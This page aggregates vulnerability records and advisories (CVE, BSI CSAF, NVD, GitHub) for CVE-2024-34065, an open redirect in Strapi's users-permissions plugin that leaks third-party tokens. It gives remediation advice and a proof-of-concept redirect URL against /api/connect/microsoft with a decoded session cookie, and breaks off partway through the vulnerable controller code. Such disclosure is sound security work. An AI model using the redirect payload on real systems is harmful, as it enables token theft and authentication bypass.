cvelistv5 - cve-2024-34065

CVE-2024-34065 (GCVE-0-2024-34065)

Vulnerability from cvelistv5 – Published: 2024-06-12 14:54 – Updated: 2024-08-02 02:42

Summary

Strapi is an open-source content management system. By combining two vulnerabilities (an `Open Redirect` and `session token sent as URL query parameter`) in @strapi/plugin-users-permissions before version 4.24.2, is its possible of an unauthenticated attacker to bypass authentication mechanisms and retrieve the 3rd party tokens. The attack requires user interaction (one click). Unauthenticated attackers can leverage two vulnerabilities to obtain an 3rd party token and the bypass authentication of Strapi apps. Users should upgrade @strapi/plugin-users-permissions to version 4.24.2 to receive a patch.

Severity ?

7.1 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N

CWE

CWE-294 - Authentication Bypass by Capture-replay
CWE-601 - URL Redirection to Untrusted Site ('Open Redirect')

Assigner

GitHub_M

References

URL

Tags

https://github.com/strapi/strapi/security/advisor…

x_refsource_CONFIRM

Impacted products

	Vendor	Product	Version
	strapi	strapi	Affected: < 4.24.2

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "affected": [
          {
            "cpes": [
              "cpe:2.3:a:strapi:strapi:*:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "strapi",
            "vendor": "strapi",
            "versions": [
              {
                "lessThanOrEqual": "4.24.1",
                "status": "affected",
                "version": "0",
                "versionType": "custom"
              }
            ]
          }
        ],
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-34065",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-12T16:08:21.487136Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-12T16:10:44.870Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T02:42:59.898Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "https://github.com/strapi/strapi/security/advisories/GHSA-wrvh-rcmr-9qfc",
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://github.com/strapi/strapi/security/advisories/GHSA-wrvh-rcmr-9qfc"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "strapi",
          "vendor": "strapi",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 4.24.2"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Strapi is an open-source content management system. By combining two vulnerabilities (an `Open Redirect` and `session token sent as URL query parameter`) in @strapi/plugin-users-permissions before version 4.24.2, is its possible of an unauthenticated attacker to bypass authentication mechanisms and retrieve the 3rd party tokens. The attack requires user interaction (one click). Unauthenticated attackers can leverage two vulnerabilities to obtain an 3rd party token and the bypass authentication of Strapi apps. Users should upgrade @strapi/plugin-users-permissions to version 4.24.2 to receive a patch."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.1,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "LOW",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-294",
              "description": "CWE-294: Authentication Bypass by Capture-replay",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-601",
              "description": "CWE-601: URL Redirection to Untrusted Site (\u0027Open Redirect\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2024-06-12T14:54:46.045Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/strapi/strapi/security/advisories/GHSA-wrvh-rcmr-9qfc",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/strapi/strapi/security/advisories/GHSA-wrvh-rcmr-9qfc"
        }
      ],
      "source": {
        "advisory": "GHSA-wrvh-rcmr-9qfc",
        "discovery": "UNKNOWN"
      },
      "title": "@strapi/plugin-users-permissions leaks 3rd party authentication tokens and authentication bypass"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2024-34065",
    "datePublished": "2024-06-12T14:54:46.045Z",
    "dateReserved": "2024-04-30T06:56:33.381Z",
    "dateUpdated": "2024-08-02T02:42:59.898Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "fkie_nvd": {
      "configurations": "[{\"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:a:strapi:strapi:*:*:*:*:*:*:*:*\", \"versionEndExcluding\": \"4.24.2\", \"matchCriteriaId\": \"D0B5DAE3-AC23-48C9-B266-7315B643700A\"}]}]}]",
      "descriptions": "[{\"lang\": \"en\", \"value\": \"Strapi is an open-source content management system. By combining two vulnerabilities (an `Open Redirect` and `session token sent as URL query parameter`) in @strapi/plugin-users-permissions before version 4.24.2, is its possible of an unauthenticated attacker to bypass authentication mechanisms and retrieve the 3rd party tokens. The attack requires user interaction (one click). Unauthenticated attackers can leverage two vulnerabilities to obtain an 3rd party token and the bypass authentication of Strapi apps. Users should upgrade @strapi/plugin-users-permissions to version 4.24.2 to receive a patch.\"}, {\"lang\": \"es\", \"value\": \"Strapi es un sistema de gesti\\u00f3n de contenidos de c\\u00f3digo abierto. Al combinar dos vulnerabilidades (un `Open Redirect` y un `token de sesi\\u00f3n enviado como par\\u00e1metro de consulta de URL`) en @strapi/plugin-users-permissions antes de la versi\\u00f3n 4.24.2, es posible que un atacante no autenticado evite los mecanismos de autenticaci\\u00f3n y recupere  the 3rd party tokens. El ataque requiere la interacci\\u00f3n del usuario (un clic). Los atacantes no autenticados pueden aprovechar dos vulnerabilidades para obtener un token de terceros y evitar la autenticaci\\u00f3n de las aplicaciones Strapi. Los usuarios deben actualizar @strapi/plugin-users-permissions a la versi\\u00f3n 4.24.2 para recibir un parche.\"}]",
      "id": "CVE-2024-34065",
      "lastModified": "2024-11-21T09:18:00.980",
      "metrics": "{\"cvssMetricV31\": [{\"source\": \"security-advisories@github.com\", \"type\": \"Secondary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N\", \"baseScore\": 7.1, \"baseSeverity\": \"HIGH\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"NONE\", \"userInteraction\": \"REQUIRED\", \"scope\": \"UNCHANGED\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"LOW\", \"availabilityImpact\": \"NONE\"}, \"exploitabilityScore\": 2.8, \"impactScore\": 4.2}, {\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N\", \"baseScore\": 8.1, \"baseSeverity\": \"HIGH\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"NONE\", \"userInteraction\": \"REQUIRED\", \"scope\": \"UNCHANGED\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"HIGH\", \"availabilityImpact\": \"NONE\"}, \"exploitabilityScore\": 2.8, \"impactScore\": 5.2}]}",
      "published": "2024-06-12T15:15:51.460",
      "references": "[{\"url\": \"https://github.com/strapi/strapi/security/advisories/GHSA-wrvh-rcmr-9qfc\", \"source\": \"security-advisories@github.com\", \"tags\": [\"Exploit\", \"Vendor Advisory\"]}, {\"url\": \"https://github.com/strapi/strapi/security/advisories/GHSA-wrvh-rcmr-9qfc\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Exploit\", \"Vendor Advisory\"]}]",
      "sourceIdentifier": "security-advisories@github.com",
      "vulnStatus": "Modified",
      "weaknesses": "[{\"source\": \"security-advisories@github.com\", \"type\": \"Secondary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-294\"}, {\"lang\": \"en\", \"value\": \"CWE-601\"}]}, {\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-294\"}, {\"lang\": \"en\", \"value\": \"CWE-601\"}]}]"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2024-34065\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2024-06-12T15:15:51.460\",\"lastModified\":\"2024-11-21T09:18:00.980\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Strapi is an open-source content management system. By combining two vulnerabilities (an `Open Redirect` and `session token sent as URL query parameter`) in @strapi/plugin-users-permissions before version 4.24.2, is its possible of an unauthenticated attacker to bypass authentication mechanisms and retrieve the 3rd party tokens. The attack requires user interaction (one click). Unauthenticated attackers can leverage two vulnerabilities to obtain an 3rd party token and the bypass authentication of Strapi apps. Users should upgrade @strapi/plugin-users-permissions to version 4.24.2 to receive a patch.\"},{\"lang\":\"es\",\"value\":\"Strapi es un sistema de gesti\u00f3n de contenidos de c\u00f3digo abierto. Al combinar dos vulnerabilidades (un `Open Redirect` y un `token de sesi\u00f3n enviado como par\u00e1metro de consulta de URL`) en @strapi/plugin-users-permissions antes de la versi\u00f3n 4.24.2, es posible que un atacante no autenticado evite los mecanismos de autenticaci\u00f3n y recupere  the 3rd party tokens. El ataque requiere la interacci\u00f3n del usuario (un clic). Los atacantes no autenticados pueden aprovechar dos vulnerabilidades para obtener un token de terceros y evitar la autenticaci\u00f3n de las aplicaciones Strapi. Los usuarios deben actualizar @strapi/plugin-users-permissions a la versi\u00f3n 4.24.2 para recibir un parche.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N\",\"baseScore\":7.1,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.8,\"impactScore\":4.2},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N\",\"baseScore\":8.1,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"REQUIRED\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"NONE\"},\"exploitabilityScore\":2.8,\"impactScore\":5.2}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-294\"},{\"lang\":\"en\",\"value\":\"CWE-601\"}]},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-294\"},{\"lang\":\"en\",\"value\":\"CWE-601\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:strapi:strapi:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"4.24.2\",\"matchCriteriaId\":\"D0B5DAE3-AC23-48C9-B266-7315B643700A\"}]}]}],\"references\":[{\"url\":\"https://github.com/strapi/strapi/security/advisories/GHSA-wrvh-rcmr-9qfc\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/strapi/strapi/security/advisories/GHSA-wrvh-rcmr-9qfc\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CVE Program Container\", \"references\": [{\"url\": \"https://github.com/strapi/strapi/security/advisories/GHSA-wrvh-rcmr-9qfc\", \"name\": \"https://github.com/strapi/strapi/security/advisories/GHSA-wrvh-rcmr-9qfc\", \"tags\": [\"x_refsource_CONFIRM\", \"x_transferred\"]}], \"providerMetadata\": {\"orgId\": \"af854a3a-2127-422b-91ae-364da2661108\", \"shortName\": \"CVE\", \"dateUpdated\": \"2024-08-02T02:42:59.898Z\"}}, {\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2024-34065\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2024-06-12T16:08:21.487136Z\"}}}], \"affected\": [{\"cpes\": [\"cpe:2.3:a:strapi:strapi:*:*:*:*:*:*:*:*\"], \"vendor\": \"strapi\", \"product\": \"strapi\", \"versions\": [{\"status\": \"affected\", \"version\": \"0\", \"versionType\": \"custom\", \"lessThanOrEqual\": \"4.24.1\"}], \"defaultStatus\": \"unknown\"}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2024-06-12T16:10:40.630Z\"}}], \"cna\": {\"title\": \"@strapi/plugin-users-permissions leaks 3rd party authentication tokens and authentication bypass\", \"source\": {\"advisory\": \"GHSA-wrvh-rcmr-9qfc\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 7.1, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N\", \"integrityImpact\": \"LOW\", \"userInteraction\": \"REQUIRED\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"NONE\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"strapi\", \"product\": \"strapi\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 4.24.2\"}]}], \"references\": [{\"url\": \"https://github.com/strapi/strapi/security/advisories/GHSA-wrvh-rcmr-9qfc\", \"name\": \"https://github.com/strapi/strapi/security/advisories/GHSA-wrvh-rcmr-9qfc\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Strapi is an open-source content management system. By combining two vulnerabilities (an `Open Redirect` and `session token sent as URL query parameter`) in @strapi/plugin-users-permissions before version 4.24.2, is its possible of an unauthenticated attacker to bypass authentication mechanisms and retrieve the 3rd party tokens. The attack requires user interaction (one click). Unauthenticated attackers can leverage two vulnerabilities to obtain an 3rd party token and the bypass authentication of Strapi apps. Users should upgrade @strapi/plugin-users-permissions to version 4.24.2 to receive a patch.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-294\", \"description\": \"CWE-294: Authentication Bypass by Capture-replay\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-601\", \"description\": \"CWE-601: URL Redirection to Untrusted Site (\u0027Open Redirect\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2024-06-12T14:54:46.045Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2024-34065\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2024-08-02T02:42:59.898Z\", \"dateReserved\": \"2024-04-30T06:56:33.381Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2024-06-12T14:54:46.045Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}

WID-SEC-W-2024-1455

Vulnerability from csaf_certbund - Published: 2024-06-25 22:00 - Updated: 2024-06-25 22:00

Summary

Strapi: Schwachstelle ermöglicht Umgehen von Sicherheitsvorkehrungen

Notes

Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.

Produktbeschreibung

Strapi ist ein headless Content-Management-System (CMS), dass als Open-Source-Software entwickelt wird.

Angriff

Ein entfernter, anonymer Angreifer kann eine Schwachstelle in Strapi ausnutzen, um Sicherheitsvorkehrungen zu umgehen.

Betroffene Betriebssysteme

- Linux - Windows

JSON

To clipboard

{
  "document": {
    "aggregate_severity": {
      "text": "mittel"
    },
    "category": "csaf_base",
    "csaf_version": "2.0",
    "distribution": {
      "tlp": {
        "label": "WHITE",
        "url": "https://www.first.org/tlp/"
      }
    },
    "lang": "de-DE",
    "notes": [
      {
        "category": "legal_disclaimer",
        "text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
      },
      {
        "category": "description",
        "text": "Strapi ist ein headless Content-Management-System (CMS), dass als Open-Source-Software entwickelt wird.",
        "title": "Produktbeschreibung"
      },
      {
        "category": "summary",
        "text": "Ein entfernter, anonymer Angreifer kann eine Schwachstelle in Strapi ausnutzen, um Sicherheitsvorkehrungen zu umgehen.",
        "title": "Angriff"
      },
      {
        "category": "general",
        "text": "- Linux\n- Windows",
        "title": "Betroffene Betriebssysteme"
      }
    ],
    "publisher": {
      "category": "other",
      "contact_details": "csaf-provider@cert-bund.de",
      "name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
      "namespace": "https://www.bsi.bund.de"
    },
    "references": [
      {
        "category": "self",
        "summary": "WID-SEC-W-2024-1455 - CSAF Version",
        "url": "https://wid.cert-bund.de/.well-known/csaf/white/2024/wid-sec-w-2024-1455.json"
      },
      {
        "category": "self",
        "summary": "WID-SEC-2024-1455 - Portal Version",
        "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2024-1455"
      },
      {
        "category": "external",
        "summary": "Quarkslab\u0027s blog vom 2024-06-25",
        "url": "http://blog.quarkslab.com/looking-for-vulnerabilities-in-strapi-cve-2024-34065.html"
      },
      {
        "category": "external",
        "summary": "Nist Vulnerability Database vom 2024-06-25",
        "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34065"
      },
      {
        "category": "external",
        "summary": "Strapi GitHub vom 2024-06-25",
        "url": "https://github.com/strapi/strapi/security/advisories/GHSA-wrvh-rcmr-9qfc"
      }
    ],
    "source_lang": "en-US",
    "title": "Strapi: Schwachstelle erm\u00f6glicht Umgehen von Sicherheitsvorkehrungen",
    "tracking": {
      "current_release_date": "2024-06-25T22:00:00.000+00:00",
      "generator": {
        "date": "2024-08-15T18:10:34.961+00:00",
        "engine": {
          "name": "BSI-WID",
          "version": "1.3.5"
        }
      },
      "id": "WID-SEC-W-2024-1455",
      "initial_release_date": "2024-06-25T22:00:00.000+00:00",
      "revision_history": [
        {
          "date": "2024-06-25T22:00:00.000+00:00",
          "number": "1",
          "summary": "Initiale Fassung"
        }
      ],
      "status": "final",
      "version": "1"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_version_range",
                "name": "plugin-users-permissions \u003c4.24.2",
                "product": {
                  "name": "Open Source Strapi plugin-users-permissions \u003c4.24.2",
                  "product_id": "T035637"
                }
              }
            ],
            "category": "product_name",
            "name": "Strapi"
          }
        ],
        "category": "vendor",
        "name": "Open Source"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2024-34065",
      "notes": [
        {
          "category": "description",
          "text": "Es besteht eine Schwachstelle in Strapi. Dieser Fehler besteht im Plugin f\u00fcr Benutzerberechtigungen aufgrund einer Kombination aus einer offenen Umleitung und einem Capture-Relay, das es erm\u00f6glicht, die Token von Drittanbietern abzurufen. Ein entfernter, anonymer Angreifer kann diese Schwachstelle ausnutzen, um die Authentifizierung zu umgehen. Eine erfolgreiche Ausnutzung erfordert eine Benutzerinteraktion."
        }
      ],
      "release_date": "2024-06-25T22:00:00.000+00:00",
      "title": "CVE-2024-34065"
    }
  ]
}

FKIE_CVE-2024-34065

Vulnerability from fkie_nvd - Published: 2024-06-12 15:15 - Updated: 2024-11-21 09:18

Severity ?

7.1 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N
8.1 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/strapi/strapi/security/advisories/GHSA-wrvh-rcmr-9qfc	Exploit, Vendor Advisory
	af854a3a-2127-422b-91ae-364da2661108	https://github.com/strapi/strapi/security/advisories/GHSA-wrvh-rcmr-9qfc	Exploit, Vendor Advisory

Impacted products

	Vendor	Product	Version
	strapi	strapi	*

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:strapi:strapi:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "D0B5DAE3-AC23-48C9-B266-7315B643700A",
              "versionEndExcluding": "4.24.2",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Strapi is an open-source content management system. By combining two vulnerabilities (an `Open Redirect` and `session token sent as URL query parameter`) in @strapi/plugin-users-permissions before version 4.24.2, is its possible of an unauthenticated attacker to bypass authentication mechanisms and retrieve the 3rd party tokens. The attack requires user interaction (one click). Unauthenticated attackers can leverage two vulnerabilities to obtain an 3rd party token and the bypass authentication of Strapi apps. Users should upgrade @strapi/plugin-users-permissions to version 4.24.2 to receive a patch."
    },
    {
      "lang": "es",
      "value": "Strapi es un sistema de gesti\u00f3n de contenidos de c\u00f3digo abierto. Al combinar dos vulnerabilidades (un `Open Redirect` y un `token de sesi\u00f3n enviado como par\u00e1metro de consulta de URL`) en @strapi/plugin-users-permissions antes de la versi\u00f3n 4.24.2, es posible que un atacante no autenticado evite los mecanismos de autenticaci\u00f3n y recupere  the 3rd party tokens. El ataque requiere la interacci\u00f3n del usuario (un clic). Los atacantes no autenticados pueden aprovechar dos vulnerabilidades para obtener un token de terceros y evitar la autenticaci\u00f3n de las aplicaciones Strapi. Los usuarios deben actualizar @strapi/plugin-users-permissions a la versi\u00f3n 4.24.2 para recibir un parche."
    }
  ],
  "id": "CVE-2024-34065",
  "lastModified": "2024-11-21T09:18:00.980",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 7.1,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "LOW",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 4.2,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      },
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 8.1,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 5.2,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2024-06-12T15:15:51.460",
  "references": [
    {
      "source": "security-advisories@github.com",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/strapi/strapi/security/advisories/GHSA-wrvh-rcmr-9qfc"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Vendor Advisory"
      ],
      "url": "https://github.com/strapi/strapi/security/advisories/GHSA-wrvh-rcmr-9qfc"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-294"
        },
        {
          "lang": "en",
          "value": "CWE-601"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    },
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-294"
        },
        {
          "lang": "en",
          "value": "CWE-601"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

GHSA-WRVH-RCMR-9QFC

Vulnerability from github – Published: 2024-06-12 19:39 – Updated: 2024-06-12 19:39

Summary

@strapi/plugin-users-permissions leaks 3rd party authentication tokens and authentication bypass

Details

Summary

By combining two vulnerabilities (an Open Redirect and session token sent as URL query parameter) in Strapi framework is its possible of an unauthenticated attacker to bypass authentication mechanisms and retrieve the 3rd party tokens. The attack requires user interaction (one click).

Impact

Unauthenticated attackers can leverage two vulnerabilities to obtain an 3rd party token and the bypass authentication of Strapi apps.

Technical details

Vulnerability 1: Open Redirect

Description

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain.

In the specific context of Strapi, this vulnerability allows the SSO token to be stolen, allowing an attacker to authenticate himself within the application.

Remediation

If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behavior can be avoided in two ways:

Remove the redirection function from the application, and replace links to it with direct links to the relevant target URLs.
Maintain a server-side list of all URLs that are permitted for redirection. Instead of passing the target URL as a parameter to the redirector, pass an index into this list.

If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:

The application should use relative URLs in all of its redirects, and the redirection function should strictly validate that the URL received is a relative URL.
The application should use URLs relative to the web root for all of its redirects, and the redirection function should validate that the URL received starts with a slash character. It should then prepend http://yourdomainname.com to the URL before issuing the redirect.

Example 1: Open Redirect in /api/connect/microsoft via `$_GET["callback"]`

Path: /api/connect/microsoft
Parameter: $_GET["callback"]

Payload:

https://google.fr/

Final payload:

https://<TARGET>/api/connect/microsoft?callback=https://google.fr/

User clicks on the link:

Look at the intercepted request in Burp and see the redirect to Microsoft:

Microsoft check the cookies and redirects to the original domain (and route) but with different GET parameters.

Then, the page redirects to the domain controlled by the attacker (and a token is added to controlled the URL):

The domain originally specified (https://google.fr) as $_GET["callback"] parameter is present in the cookies. So \<TARGET> is using the cookies (koa.sess) to redirect.

koa.sess cookie:

eyJncmFudCI6eyJwcm92aWRlciI6Im1pY3Jvc29mdCIsImR5bmFtaWMiOnsiY2FsbGJhY2siOiJodHRwczovL2dvb2dsZS5mci8ifX0sIl9leHBpcmUiOjE3MDAyMzQyNDQyNjMsIl9tYXhBZ2UiOjg2NDAwMDAwfQ==

{"grant":{"provider":"microsoft","dynamic":{"callback":"https://google.fr/"}},"_expire":1700234244263,"_maxAge":86400000}

The vulnerability seems to come from the application's core:

File: packages/plugins/users-permissions/server/controllers/auth.js

'use strict';

/**
 * Auth.js controller
 *
 * @description: A set of functions called "actions" for managing `Auth`.
 */

/* eslint-disable no-useless-escape */
const crypto = require('crypto');
const _ = require('lodash');
const { concat, compact, isArray } = require('lodash/fp');
const utils = require('@strapi/utils');
const {
  contentTypes: { getNonWritableAttributes },
} = require('@strapi/utils');
const { getService } = require('../utils');
const {
  validateCallbackBody,
  validateRegisterBody,
  validateSendEmailConfirmationBody,
  validateForgotPasswordBody,
  validateResetPasswordBody,
  validateEmailConfirmationBody,
  validateChangePasswordBody,
} = require('./validation/auth');

const { getAbsoluteAdminUrl, getAbsoluteServerUrl, sanitize } = utils;
const { ApplicationError, ValidationError, ForbiddenError } = utils.errors;

const sanitizeUser = (user, ctx) => {
  const { auth } = ctx.state;
  const userSchema = strapi.getModel('plugin::users-permissions.user');

  return sanitize.contentAPI.output(user, userSchema, { auth });
